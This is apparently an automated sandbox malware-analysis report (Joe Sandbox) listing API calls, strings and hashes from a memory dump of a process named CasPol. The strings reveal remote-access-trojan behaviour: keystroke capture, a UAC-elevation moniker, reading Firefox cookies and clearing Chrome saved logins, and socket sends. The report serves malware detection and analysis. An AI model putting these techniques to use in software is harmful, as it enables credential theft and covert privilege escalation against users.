                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                          • API String ID: 0-3177665633
                                                                                                                                                                          • Opcode ID: 0a489d5e0e760ad1c7226f97b7491b422d815e77a9228981358e888a0221c37f
                                                                                                                                                                          • Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a489d5e0e760ad1c7226f97b7491b422d815e77a9228981358e888a0221c37f
                                                                                                                                                                          • Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                          • String ID: (kG
                                                                                                                                                                          • API String ID: 1888522110-2813241365
                                                                                                                                                                          • Opcode ID: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                                                                                                                                                          • Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
                                                                                                                                                                          • Opcode Fuzzy Hash: 79348ff8eaa35f6faedaca36de41c7c480938a272048c625dc6fe4e82d71162d
                                                                                                                                                                          • Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                          • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object_wcslen
                                                                                                                                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                          • API String ID: 240030777-3166923314
                                                                                                                                                                          • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                          • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                                                          • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758F8), ref: 0041A7EF
                                                                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3587775597-0
                                                                                                                                                                          • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                          • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                                                          • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                          • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                          • String ID: JD$JD$JD
                                                                                                                                                                          • API String ID: 745075371-3517165026
                                                                                                                                                                          • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                          • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                          • API String ID: 1164774033-405221262
                                                                                                                                                                          • Opcode ID: db36566fedf6bac1efbe0509ba0d37d449c306ac76c2810c026643bd9d72ced7
                                                                                                                                                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                                                          • Opcode Fuzzy Hash: db36566fedf6bac1efbe0509ba0d37d449c306ac76c2810c026643bd9d72ced7
                                                                                                                                                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                          • API String ID: 2127411465-314212984
                                                                                                                                                                          • Opcode ID: e81c308c57b575c0e19917405a6b13ad767e5a83490b72fb327ce1d33a26cac6
                                                                                                                                                                          • Instruction ID: cc57822c2a7f940fffebe33daf0632284ddc1748a3b8d5e961f42c670a34d5b4
                                                                                                                                                                          • Opcode Fuzzy Hash: e81c308c57b575c0e19917405a6b13ad767e5a83490b72fb327ce1d33a26cac6
                                                                                                                                                                          • Instruction Fuzzy Hash: D1B1F671A0430066CA14BB76DC579AF36A89F91748F40053FB906671E2EE7D8A48C6DA
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00449292
                                                                                                                                                                          • _free.LIBCMT ref: 004492B6
                                                                                                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                          • _free.LIBCMT ref: 00449609
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 314583886-0
                                                                                                                                                                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                                                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Find$CreateFirstNext
                                                                                                                                                                          • String ID: `XG$`XG$h]v$h}v
                                                                                                                                                                          • API String ID: 341183262-1394002874
                                                                                                                                                                          • Opcode ID: f455fec234fb88beee6ba430f665805b6b71df17feba6dd7292f0e9b07eae81b
                                                                                                                                                                          • Instruction ID: 3e2b8d556a8fbdbb081ab446324185a4f3aab8361380fbf0113865ad31d0729a
                                                                                                                                                                          • Opcode Fuzzy Hash: f455fec234fb88beee6ba430f665805b6b71df17feba6dd7292f0e9b07eae81b
                                                                                                                                                                          • Instruction Fuzzy Hash: 588151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                          • API String ID: 1589313981-2876530381
                                                                                                                                                                          • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                                                          APIs
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                                                          Strings
                                                                                                                                                                          • UserProfile, xrefs: 0040BA59
                                                                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                          • API String ID: 2018770650-1062637481
                                                                                                                                                                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                                          • API String ID: 3534403312-3733053543
                                                                                                                                                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
                                                                                                                                                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1824512719-0
                                                                                                                                                                          • Opcode ID: 4f59db4eab98a7b62ba9f6616cb54e6cadf5fa6bc43d1ac28df0b82becba1c42
                                                                                                                                                                          • Instruction ID: 7a56ba3823c44b8d3dadbfeca74e3365e00ee059376cf1b582d15bdd70b30780
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f59db4eab98a7b62ba9f6616cb54e6cadf5fa6bc43d1ac28df0b82becba1c42
                                                                                                                                                                          • Instruction Fuzzy Hash: 8AB19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 276877138-0
                                                                                                                                                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
